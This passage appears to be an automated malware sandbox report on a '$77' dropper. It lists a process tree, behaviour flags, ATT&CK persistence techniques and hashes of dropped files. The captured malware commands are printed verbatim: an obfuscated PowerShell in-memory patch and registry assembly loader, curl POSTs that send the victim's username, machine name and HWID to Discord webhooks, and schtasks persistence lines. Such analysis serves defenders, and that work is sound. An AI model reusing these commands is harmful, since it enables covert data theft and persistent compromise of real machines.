bsKquGnQrBRlb).Invoke($YlYSDLczSfqNbAFze,[uint32]8,4,[ref]$UISooMkNsu);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$YlYSDLczSfqNbAFze,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dFswwMZgFBecwnDhF,$bVQwzdyqubsKquGnQrBRlb).Invoke($YlYSDLczSfqNbAFze,[uint32]8,0x20,[ref]$UISooMkNsu);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'F'+[Char](84)+'W'+'A'+''+[Char](82)+'E').GetValue('$'+'7'+''+[Char](55)+'s'+[Char](116)+''+[Char](97)+''+'g'+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Users\Admin\AppData\Roaming\$77-scchost.exeC:\Users\Admin\AppData\Roaming\$77-scchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\$77-scchost.exeC:\Users\Admin\AppData\Roaming\$77-scchost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
-
C:\Users\Admin\AppData\Local\Temp\Dropper.exe"C:\Users\Admin\AppData\Local\Temp\Dropper.exe"2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\curl.execurl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"4⤵
-
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Users\Admin\AppData\Roaming\$77-scchost.exe"4⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp52ED.tmp.bat""4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Roaming\$77-aachost.exe"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c curl -X POST -H "Content-Type: application/json" -d "{\"content\": \"@everyone \nWe Got Em! \n```Username: Admin\nOS: Microsoft Windows NT 6.2.9200.0\nProcessors: 8\nMachine Name: OAILVCNY\nSystem Architecture: 64-bit\nHWID: 7580D06170B47B6124F3\nUser HWID: S-1-5-21-3808065738-1666277613-1125846146-1000\nAnti-Virus: N/A\n```\"}" https://discord.com/api/webhooks/1253702401148588093/dy9JeySIO-GmMDLOGujcr56gIgSixllB84150v7DKIbzkhbLiHitZal0nF3_B2IriNPY6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\curl.execurl -X POST -H "Content-Type: application/json" -d "{\"content\": \"@everyone \nWe Got Em! \n```Username: Admin\nOS: Microsoft Windows NT 6.2.9200.0\nProcessors: 8\nMachine Name: OAILVCNY\nSystem Architecture: 64-bit\nHWID: 7580D06170B47B6124F3\nUser HWID: S-1-5-21-3808065738-1666277613-1125846146-1000\nAnti-Virus: N/A\n```\"}" https://discord.com/api/webhooks/1253702401148588093/dy9JeySIO-GmMDLOGujcr56gIgSixllB84150v7DKIbzkhbLiHitZal0nF3_B2IriNPY7⤵
-
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\$77-install.exe"C:\Users\Admin\AppData\Local\Temp\$77-install.exe"3⤵
- Executes dropped EXE
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x2ac,0x7ffadb592e98,0x7ffadb592ea4,0x7ffadb592eb02⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2376 --field-trial-handle=2180,i,12780723798465539942,12010519452607841069,262144 --variations-seed-version /prefetch:32⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=748 --field-trial-handle=2180,i,12780723798465539942,12010519452607841069,262144 --variations-seed-version /prefetch:82⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 0f4179844b985fb0da3eec13dbbf6599 3/8dJH+muUyT9r7paoNZ2Q.0.1.0.0.01⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
- Drops file in Windows directory
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506Filesize
328B
MD532bc23a156b94fdca424e2e72b56e637
SHA14ad7e3e7935014d6403951edafab5de566744ec3
SHA256517bf22575fb2884cae403a8f91d7a32e6f765c9dbeffedad27c481e7108f6a5
SHA512b1e96ef792f44900914716f2e2c52388c85309bfb45271a2fd58377cb2dd823f81e00457ecb1c084490fca5222b1e18a1e22a567704d29b50428fed249dcdc44
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-aachost.exe.logFilesize
425B
MD5fff5cbccb6b31b40f834b8f4778a779a
SHA1899ed0377e89f1ed434cfeecc5bc0163ebdf0454
SHA256b8f7e4ed81764db56b9c09050f68c5a26af78d8a5e2443e75e0e1aa7cd2ccd76
SHA5121a188a14c667bc31d2651b220aa762be9cce4a75713217846fbe472a307c7bbc6e3c27617f75f489902a534d9184648d204d03ee956ac57b11aa90551248b8f9
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-scchost.exe.logFilesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exeFilesize
66KB
MD5f10712f4faa374be8f37668c5ebed4a6
SHA1bb30e941c4f91ae3178539e993abecbfd838fdb0
SHA256d66c793c2e3290b3996b54f5a2fc2c1973fc41677ec46ce0e0e30aa4e7916acf
SHA512cb838ec3d65ca49bb25bd93e06666e6c2640c66fd0b68fc826ca763a3dedcc4d4033abab7cfca2fff3bf08ed98d14533abf19026fd9d1845dbf09fcb241840ac
-
C:\Users\Admin\AppData\Local\Temp\$77-install.exeFilesize
163KB
MD51a7d1b5d24ba30c4d3d5502295ab5e89
SHA12d5e69cf335605ba0a61f0bbecbea6fc06a42563
SHA256b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
SHA512859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa
-
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exeFilesize
256KB
MD518f497deffe88b6b2cff336a277aface
SHA14e1413241d3d3e4dbff399d179f8fd64f3ecd39e
SHA2568133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5
SHA51235c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d
-
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exeFilesize
50KB
MD577a71f3a441aa3bf824967e52413bec5
SHA1c3d6df5cfc5eefaadf9bcb3703484e3cadf79588
SHA2561e6c87e492d90fbc4b9d2a16676a58735e33861f780c6c3020869337a0ccfc82
SHA51231c413cb410b366b63f0e763e288c2795584f9c7fda41eeea45f7d32a853da87e3ab58a144ff02a75b1d1803c7fef9fe3d561133a50a4e600799ed6f9050fd5b
-
C:\Users\Admin\AppData\Local\Temp\tmp52ED.tmp.batFilesize
155B
MD59b6e8e8ce72ad52deafbd4d2bc6480bb
SHA17d16dc02b70df15441e89e54babf48ba96c88f58
SHA256d360bdb977378c9815dd8e0d25fd7cf1361df67052e5cd805329df7cfc6307dc
SHA512216e463cf2c06450b1c22b244d8e7f0245b443faee70afb9e3daf73868b7e827f4b0b400889af40857d9b4f3b33dcc5ee3ec0bc288c3de21efc1138d52197365
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance WorkFilesize
2KB
MD58abf2d6067c6f3191a015f84aa9b6efe
SHA198f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance WorkFilesize
2KB
MD5f313c5b4f95605026428425586317353
SHA106be66fa06e1cffc54459c38d3d258f46669d01a
SHA256129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To WorkFilesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule WorkFilesize
2KB
MD51e8e2076314d54dd72e7ee09ff8a52ab
SHA15fd0a67671430f66237f483eef39ff599b892272
SHA25655f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA5125b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule WorkFilesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
SHA19e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4
-
C:\Windows\TEMP\tmp7F0E.tmp.batFilesize
163B
MD52d3c4d4b6b08387e03fc293d19a95376
SHA182f7c816553585a325f32d6e0474c5926510a8ad
SHA2566199d2a0e27c18592f52dd4727c445864ae64e0e825c8796fbac0ee40e58a43c
SHA51250529c80b62a010107bba8d47a825b697ab7e97f7dd2827e03fa0c6829881308615d696210632479ff54b78d8f6fb75f1b1210e1013b887a482314cdf389ea48
-
C:\Windows\Temp\__PSScriptPolicyTest_zxojcesq.kbk.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\test.exeFilesize
350KB
MD55f53c38dc281b27c951b860a0513c645
SHA12a818fd6f12557eff87beb05156dbe9b13f1ab0a
SHA256bc28401e3bbd206a7ba17b9837a07c80291f08ad7d1e78150ad5ef399496b48f
SHA512e62fe3cc1176cf77f19f780318c9af6ab05535e92b97a525082dcbc367ed0beae27a99dda655cd198a1a808fbe558f88a7f2bb28e0ad0534b2c90951767dd916
-
memory/396-305-0x000001926B060000-0x000001926B08B000-memory.dmpFilesize
172KB
-
memory/612-261-0x00000245BDA40000-0x00000245BDA6B000-memory.dmpFilesize
172KB
-
memory/612-268-0x00007FFAC3530000-0x00007FFAC3540000-memory.dmpFilesize
64KB
-
memory/612-267-0x00000245BDA40000-0x00000245BDA6B000-memory.dmpFilesize
172KB
-
memory/612-260-0x00000245BDA40000-0x00000245BDA6B000-memory.dmpFilesize
172KB
-
memory/612-259-0x00000245BDA10000-0x00000245BDA35000-memory.dmpFilesize
148KB
-
memory/668-272-0x00000265E8ED0000-0x00000265E8EFB000-memory.dmpFilesize
172KB
-
memory/668-278-0x00000265E8ED0000-0x00000265E8EFB000-memory.dmpFilesize
172KB
-
memory/668-279-0x00007FFAC3530000-0x00007FFAC3540000-memory.dmpFilesize
64KB
-
memory/940-289-0x000002B397BA0000-0x000002B397BCB000-memory.dmpFilesize
172KB
-
memory/940-290-0x00007FFAC3530000-0x00007FFAC3540000-memory.dmpFilesize
64KB
-
memory/940-283-0x000002B397BA0000-0x000002B397BCB000-memory.dmpFilesize
172KB
-
memory/1016-300-0x0000024501CC0000-0x0000024501CEB000-memory.dmpFilesize
172KB
-
memory/1016-301-0x00007FFAC3530000-0x00007FFAC3540000-memory.dmpFilesize
64KB
-
memory/1016-294-0x0000024501CC0000-0x0000024501CEB000-memory.dmpFilesize
172KB
-
memory/1072-1-0x0000000000EB0000-0x0000000001020000-memory.dmpFilesize
1.4MB
-
memory/1072-0-0x00000000751EE000-0x00000000751EF000-memory.dmpFilesize
4KB
-
memory/1428-126-0x00000000007E0000-0x00000000007F6000-memory.dmpFilesize
88KB
-
memory/3408-212-0x0000000000FB0000-0x0000000000FB6000-memory.dmpFilesize
24KB
-
memory/3408-187-0x00000000007C0000-0x0000000000806000-memory.dmpFilesize
280KB
-
memory/3408-1239-0x000000001CE70000-0x000000001CEE6000-memory.dmpFilesize
472KB
-
memory/3924-222-0x00007FFAE2ED0000-0x00007FFAE3991000-memory.dmpFilesize
10.8MB
-
memory/3924-65-0x0000000000FD0000-0x0000000000FE2000-memory.dmpFilesize
72KB
-
memory/3924-1285-0x00007FFAE2ED0000-0x00007FFAE3991000-memory.dmpFilesize
10.8MB
-
memory/3924-64-0x00007FFAE2ED3000-0x00007FFAE2ED5000-memory.dmpFilesize
8KB
-
memory/4344-245-0x00000204716E0000-0x000002047170A000-memory.dmpFilesize
168KB
-
memory/4344-247-0x00007FFB02100000-0x00007FFB021BE000-memory.dmpFilesize
760KB
-
memory/4344-239-0x000002046F110000-0x000002046F132000-memory.dmpFilesize
136KB
-
memory/4344-246-0x00007FFB034B0000-0x00007FFB036A5000-memory.dmpFilesize
2.0MB
-
memory/5048-256-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/5048-253-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/5048-255-0x00007FFB02100000-0x00007FFB021BE000-memory.dmpFilesize
760KB
-
memory/5048-254-0x00007FFB034B0000-0x00007FFB036A5000-memory.dmpFilesize
2.0MB
-
memory/5048-251-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/5048-250-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/5048-249-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/5048-248-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB